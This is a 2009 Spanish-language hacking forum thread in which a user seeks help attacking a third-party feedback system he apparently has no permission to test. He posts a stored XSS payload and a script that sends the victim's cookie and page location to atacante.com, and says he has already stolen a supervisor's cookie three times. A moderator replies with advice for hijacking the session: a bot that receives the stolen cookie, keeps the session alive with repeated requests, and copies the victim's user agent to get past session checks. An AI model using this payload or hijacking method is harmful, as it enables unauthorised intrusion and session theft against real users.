elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  [xss] ayuda
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [xss] ayuda  (Leído 2,537 veces)
Og.


Desconectado Desconectado

Mensajes: 822


Aprendiendo de la vida


Ver Perfil
[xss] ayuda
« en: 8 Agosto 2009, 04:46 am »

hola  :D!.
Pues necesito su ayuda, asi esta la cosa:
Existe un sistema en donde tu pones tu duda, sugerencia, comentario etc.. y una persona te responde a tu comentario (en un par de dias :P) bueno, la cuestion es que ese sistema es vulnerable a xss (lo se por que ya he hecho pruebas), el sistema al que estoy atacando es completamente desconocido (yo envio el comentario y puedo verlo desde el punto de vista de un usuario comun, pero no tengo idea de lo que ve el encargado) nisiquiera se puede saber en que pagina va a ser visualizado el mensage, entonces lo que hice fue esto:
linea de escape en el msg
Código
  1. <script src=http://atacante.com/script.js ></script>

script.js
Código
  1. window.onload=function(){
  2. var a = document.getElementsByTagName("body");
  3. var ar = a[0];
  4. ar.innerHTML += "<img height=1 width=1 src=http://atacante.com/script.php?ref="+escape(document.location)+"&cook="+escape(document.cookie)+" >";
  5. }
asi consigo la cookie y tambien se donde usarla =D

El problema es que el sistema se desloguea automaticamente despues de 10 mins de no hacer nada,
todo el sistema esta administrado por sessiones (entonces capturar la cookie no me ayuda a descifrar nada).

Ya he conseguido la cookie del supervisor 3 veces, tambien se donde esta la pagina de administracion pero el problema es que cuando intento usar la session obtenida ya esta caducada, no tienen alguna idea de como puedo avanzar?

saludos!
En línea

|-
Hadess_inf
Desesperado
Colaborador
***
Desconectado Desconectado

Mensajes: 2.048


Nueva Vida


Ver Perfil WWW
Re: [xss] ayuda
« Respuesta #1 en: 8 Agosto 2009, 04:51 am »

Es dificil saber puesto que quizas sea una medida de seguridad, aignar ese tiempo de vida para esa session.

 :-X :-X :-X
En línea

Og.


Desconectado Desconectado

Mensajes: 822


Aprendiendo de la vida


Ver Perfil
Re: [xss] ayuda
« Respuesta #2 en: 8 Agosto 2009, 05:30 am »

Es dificil saber puesto que quizas sea una medida de seguridad, aignar ese tiempo de vida para esa session.

 :-X :-X :-X
y si uso la cookie al instante?
creo que se puede con sockets, asi aunque sea puedo guardar las paginas que puede ver y saber si hay algun upload o algo que me sirva, pero no tengo idea de como usarlos, alguien tendra un tutorial?
« Última modificación: 8 Agosto 2009, 05:32 am por Nphacks » En línea

|-
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: [xss] ayuda
« Respuesta #3 en: 9 Agosto 2009, 06:57 am »

haz un bot que evite la caducación de esa sesión... por ejemplo que mande la cookie a tu bot que puede tener un socket a escucha y cuando le llegue una conexión que obtenga los datos y desconecte al visitante.. loego el bot que haga repetidas peticiones get a la web con esa cookie manteniendo la sesión activa y le aprobechas de sacar capturas desde el mismo bot... luego cuando llegues el bot segurá activo, tomas su cookie y la usas.
Intenta capturar el user agent de la persona proque muchas veces ese tipo de sesiones que caducan luego también verifican el user agent para evitar entrecomillas un robo de sesión.

Talves el sistema no desloguea a los 5 o 10 minutos sino que el mismo administrador se desloguea al momento de terminar lo que hace.

Lo otro sería que lo dejes un dia viernes y te quedes esperandolo hasta el domingo y aprobechas de entrar justo en ese momento.. te haces un bot que te alerte al instante.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines